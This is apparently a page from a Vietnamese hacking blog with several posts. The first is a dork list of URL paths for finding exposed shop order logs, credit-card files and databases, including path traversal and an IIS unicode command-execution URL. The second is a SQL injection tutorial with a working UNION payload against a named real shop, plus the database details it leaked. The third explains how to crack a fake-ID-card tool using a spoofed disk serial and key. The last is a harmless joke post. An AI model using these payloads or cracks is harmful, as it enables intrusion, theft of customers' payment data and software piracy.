/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=order.log
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/cart32/CART32-order.txt
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/cgi-bin/cart32.ini
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/cart32.exe/error
/metacart/database/metacart.mdb
//shopping/database/metacart.mdb
/shopping/database/metacart.mdb
/fpdb/shop.mdb
/cgi-bin/shopper.cgi?keywords=usstick&search=action&template=order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=order.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sales.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sell.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin_files.log
/cgi-bin/shopper.cgi?keywords=usstick&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=psiber&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=9461&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=SC7021&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=cc&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=order&search=action&template=order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=moron%20&template=shopper.conf
/Merchant2/modules/log/elf.mv?search=action&ORDERLOG.txt
/Merchant2/modules/log/malf.mv?search=action&ORDERLOG.txt
/cgi-bin/shopper.exe?search=action&keywords=CD006&template=sales.log
/cgi-bin/shopper.exe?search=action&keywords=***&template=sell.log
/cgi-bin/shopper.exe?search=action&keywords=order&template=admin.log
/cgi-bin/shopper.exe?search=action&keywords=cc&template=admin_files.log
/cgi-bin/shopper.exe?search=action&keywords=hack&template=order.log
/cgi-bin/shopper.exe?search=action&keywords=9400&template=order.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/worlddirect/Web_store/Admin_files/order.log
/website/
/WebShop/templates/cc.txt
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/logs/
/WebShop/
/WebCart/orders.txt
/webcart/
/Web_store/Admin_files/order.log
/STORE/orders.txt
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/PSUser/PSCOErrPage.htm
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/PDG/order.txt
/orders/results
/Orders/orders.txt
/orders/order.log
/orders/mountain.cf
/orders/import.txt
/orders/import.txt
/orders/checks.txt
/orders/
/orders.txt
/orders.htm
/orderform/orders.txt
/order.txt
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper.exe?search=action&keywords=%20&template=shopper.conf
/cgi-bin/shopper.exe
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/perlshop.cgi
/cgi-bin/PDG_Cart/cc.log
/cgi-bin/orders/mc.txt
/cgi-bin/orders/cc.txt
/cgi-bin/orders.txt
/cgi-bin/orderlog.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00htm
/cgi-bin/ezmall2000/mall_log_files/order.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/cart32/CART32-order.txt
/cgi-bin/cart.pl
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/admin/Orders/orders.txt
/_private/shopping_cart.mdb

Read more »

Posted in: Hacking,Thủ Thuật,Tutorial,UG

TUT mysql injection shop .html

Link error

http://perfumes.sthefani.com.br/miss-elysees-feminino-p-3375'.html

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') and p.products_quantity > 0 and p.products_status = '1' order by rand() limi' at line 1

select p.products_id, p.products_quantity, p.products_image, pd.products_name, p.products_price from all_products p left join all_products_description pd on pd.products_id = p.products_id and pd.language_id = '4' left join all_manufacturers m using(manufacturers_id) left join all_products_to_categories pc on pc.products_id = p.products_id where pc.categories_id = '6' and m.sthefani_manufacturers_status = '1' and p.manufacturers_id = '157' and p.products_id not in (3375\') and p.products_quantity > 0 and p.products_status = '1' order by rand() limit 4

[TEP STOP]


Nhiều bạn nghĩ đây là site .html thì chiến thế nào
Đơn giản cái đuôi .html chỉ là Rewrite URL dùng htaccess
Về bản chất cái site này là php vs mysql
Và với kinh nghiệm bản thân thì m biết cái source của site này là oscommerce
Và cái id bị lôi là products_id (nhìn ở p.products_id not in (3375\'))
Và Khai thác như bình thường thôi

Link exploit cho các bạn :

hxxp://perfumes.sthefani.com.br/miss-elysees-feminino-p-3375) and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5-- -.html

lorenzo_user@localhost : lorenzo_lojas : 5.0.92-community     lorenzo_user@localhost : lorenzo_lojas : 5.0.92-community

Mình làm tới đây thôi
Pro đi qua nhìn thấy thì Thanks e 1 cái nhé ^^

End tut

Read more »

Posted in: Hacking,Tutorial,UG

Tut crack tool fake cmnd 1.3

Đầu tiền là thành thực xin lỗi bác, em nghèo quá nên sinh ra đạo tặc.
Để chạy soft này cần cài đặt Netframework 4.0 và WindowsInstaller 3.1
link download
http://www.mediafire.com/?054sy4zo8dmrm6i
hoặc ở đây: http://www.mediafire.com/?nynzy1zcmml

Link soft fake CMND version 1.3
link download
http://www.mediafire.com/?jd1uv8a50i37szv
Trích từ bác phihoang
Để crack tải cương trình change hdd serial của ổ cứng
Change theo serial sau
Serie: 1C41DA2C1C41D
Change xong restart máy, và dùng key này để nhập vào. 116863aed1d3a95e75a994bc2f84430b
Tất cả quá trình đều rus as admin ( win7)
Complete đa xtest mãn nguyện:">

Read more »

Posted in: Download,Tutorial,UG

Tám =))

Không hiểu đây là những câu hỏi thật sự hay có ý trêu chọc nhưng đã khiến nhiều nhân viên trực tổng đài phải dở khóc dở cười.

1.
KH: Chị cho em hỏi tòa nhà nào cao nhất TPHCM.
1080: Toà nhà 37 TÔN ĐỨC THẮNG (lúc đó chưa có Bitexco)
KH: Vậy chị cho em hỏi, em đứng trên đó nhảy xuống thì bao lâu em tiếp đất
1080:

2.
KH: Chị cho em hỏi tiệm bánh gì gì.. nổi tiếng lắm, nằm ở quận 1, mà chổ em làm nhìn qua bên đường thấy nó đó. Cho em xin số điện thoại tiệm đó đi
1080: ???????????

3.
KH: Chị cho em hỏi số điện thoại cái nhà có cái cổng cao nằm trong hẻm đường THĐ, đi vào hẻm đó khoảng 20m nằm bên phải. À, cái hẻm đó nằm gần đồng công an.
1080: ???????

4.
KH: Chị cho em hỏi mỡ heo sôi ở nhiệt độ bao nhiêu
1080: ?????

5.
KH: Chị ơi, tui kể chị nghe chuyện này
1080: Dạ, anh kể đi ạ
KH: (đọc 1 bài báo cho 1080 nghe)
đọc xong
KH: Chị thấy bài báo này kì ko, tui ko đồng ý như vậy. mà thôi tui bức xúc quá nên gọi lên đây để kể với chi nghe vậy thôi. chứ ko có gì hết, cám ơn chị nha. bye bye chị
1080:

6.
KH: Anh cho em xin 1 số tiết mục giải trí cuối tuần này đi anh
1080: Dạ cuối tuần này thì có …..
KH: Gọi lên 1080 tòan nghe giọng nữ, lần đầu tiên nghe giọng nam đó nha.
1080: Dạ, nhân vien nam bên em thì ít hơn nhân viên nữ rất nhiều
KH: Mà giọng em nghe dễ thương quá ah, chắc là chọn dữ lắm mới được vào làm với mấy em 1080 hà.
1080: Dạ,….(ko biết nói gì)
KH: Anh mấy tuổi rồi, nghe giọng anh dễ thương quá, em giới thiệu anh cho nhỏ em em
1080: Dạ em 23 tuổi
KH: Trời, anh nhỏ hon nhỏ em em 10 tuổi lận
1080:

7.
KH: Anh cho em hỏi đầu số này là số điện thoại gì mà sao nó lạ quá: 856xxxxxxxxxxxx
1080: Dạ đầu số điện thoại này là của nước Lào
KH: Nước nào hả anh
1080: Dạ nước Lào
KH: Thì nước Nào
1080: Dạ nước Lào anh ạ
KH: Thì tui nói nước Nào phải ko?
1080(lúc này moi nghĩ ra): Dạ đúng nước Lào
Kh: Cám ơn anh

8.
Có 1 cầu hỏi KH hỏi mà chưa trả lời liền dc, nên hẹn gọi lại sau cho KH
KH (giọng 1 em gái khoảng 10tuổi): Alo, ai đó
1080: Chào em, anh gọi từ đài 1080,cho anh hỏi đây có phải số điện thoại của chị XXX ko ạh
Kh: Uhm đúng rồi, có gì ko anh
1080: Em vui lòng cho anh gặp chị XXXX
KH: Chờ chút , BA ƠI, CÓ ÔNG NÀO KÍM MÁ NÈ

9.
KH: Chị ợi, dạo này em xui quá, làm gì cũng ko thành công, chi biết thầy nào giỏi ko, giới thiệu cho em để về cúng giải hạn giùm em?
KH: Anh ơi, em chỉ cho em từ số 0 đến số 99, mỗi số là con gì vậy anh (số đề)
KH: Chị cho em hỏi các đời vua Lê của mình có Lê Duẩn ko chị ?
KH: Huyền Trân công chúa là người TQ phải ko chị?
KH: Con tôm khác con tép chổ nào?
KH: Con ngựa vằn là trắng sọc đen hay đen sọc trắng?
KH: Con chó sói có phải là tổ tiên của con chó nhà ko?
…….

10.
KH: Anh ơi, em có 1 địa chỉ nhà, anh cho em xin số đt nhà kế bên được không anh ?
KH(em bé khoảng 10-12 t): Chú ơi, chú chỉ con làm bài này nha. Nước Pháp có tháp Eiffef, nước Anh có đồng hồ Big Ben. Vậy nước VN mình có gì chú?
KH (em bé): Chú ơi, con muốn nghe chuyện cổ tích, chú kể con nghe được không?

11.
KH : A biết cái bài thơ “Đêm nay bác ko ngủ” ?
1080 : Dạ biết…A cần thông tin j trong bài này ?
KH : Dzậy cho em hỏi sau khi viết hết bài đó Bác có đi ngủ ko ạ ???
1080 :

Read more »

Posted in: Linh Tinh